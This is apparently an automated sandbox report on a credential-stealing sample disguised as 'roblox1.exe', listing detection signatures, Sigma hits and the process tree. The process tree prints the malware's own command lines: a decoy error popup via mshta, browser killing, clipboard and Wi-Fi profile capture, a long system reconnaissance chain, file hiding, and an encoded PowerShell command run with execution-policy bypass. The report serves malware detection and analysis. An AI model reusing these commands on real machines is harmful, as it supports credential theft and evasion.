Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
roblox1.exe

Overview

General Information

Sample name:roblox1.exe
Analysis ID:1577530
MD5:cd463d16cf57c3a9f5c9588a878a7213
SHA1:ef22c2b11efc0bc6a739b82f9a26edaee9348b8f
SHA256:49f4789274e5c0dcd4d2cc1b850761353bf8b72e819d12df5c376fd665da1283
Tags:18521511316185215113209bulletproofexePythonStealeruser-abus3reports
Infos:

Detection

Python Stealer, Monster Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Monster Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Gathers network related connection and port information
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • roblox1.exe (PID: 1364 cmdline: "C:\Users\user\Desktop\roblox1.exe" MD5: CD463D16CF57C3A9F5C9588A878A7213)
    • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • stub.exe (PID: 3428 cmdline: C:\Users\user\Desktop\roblox1.exe MD5: 6FE46FD6E5B143F5114E6616C59B703C)
      • cmd.exe (PID: 5384 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5072 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 5168 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3908 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • tasklist.exe (PID: 356 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 5040 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • attrib.exe (PID: 5452 cmdline: attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 3488 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • mshta.exe (PID: 2752 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 3260 cmdline: C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • taskkill.exe (PID: 5396 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • cmd.exe (PID: 768 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • tasklist.exe (PID: 5500 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6488 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5960 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 900 cmdline: C:\Windows\system32\cmd.exe /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • chcp.com (PID: 880 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 2036 cmdline: C:\Windows\system32\cmd.exe /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • chcp.com (PID: 4584 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 5224 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • systeminfo.exe (PID: 6324 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 7140 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • HOSTNAME.EXE (PID: 5836 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
        • WMIC.exe (PID: 4916 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • net.exe (PID: 6120 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 6864 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • query.exe (PID: 2752 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
          • quser.exe (PID: 356 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
        • net.exe (PID: 880 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 5320 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 2788 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 1272 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 768 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 3776 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 6408 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 1660 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 7100 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • tasklist.exe (PID: 5712 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • ipconfig.exe (PID: 5896 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • ROUTE.EXE (PID: 5996 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
        • ARP.EXE (PID: 5976 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
        • NETSTAT.EXE (PID: 3500 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
        • sc.exe (PID: 7116 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • netsh.exe (PID: 4648 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • netsh.exe (PID: 900 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 6168 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • netsh.exe (PID: 1660 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 4784 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 4352 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2660 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 4424 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5844 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 3908 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeJoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
    C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeJoeSecurity_MonsterStealerYara detected Monster StealerJoe Security
      C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
            00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_MonsterStealerYara detected Monster StealerJoe Security
              00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
                  Click to see the 11 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: MSHTA Suspicious Execution 01
                  Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3488, ParentProcessName: cmd.exe, ProcessCommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", ProcessId: 2752, ProcessName: mshta.exe
                  Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
                  Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 3908, StartAddress: CAE632B0, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 3908
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA, CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA, Comm
                  Sigma detected: Console CodePage Lookup Via CHCP
                  Source: Process startedAuthor: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: C:\Windows\system32\cmd.exe /c "chcp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 900, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 880, ProcessName: chcp.com
                  Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\roblox1.exe, ParentImage: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, ParentProcessId: 3428, ParentProcessName: stub.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ProcessId: 6488, ProcessName: cmd.exe
                  Sigma detected: Suspicious Execution of Powershell with Base64
                  Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAa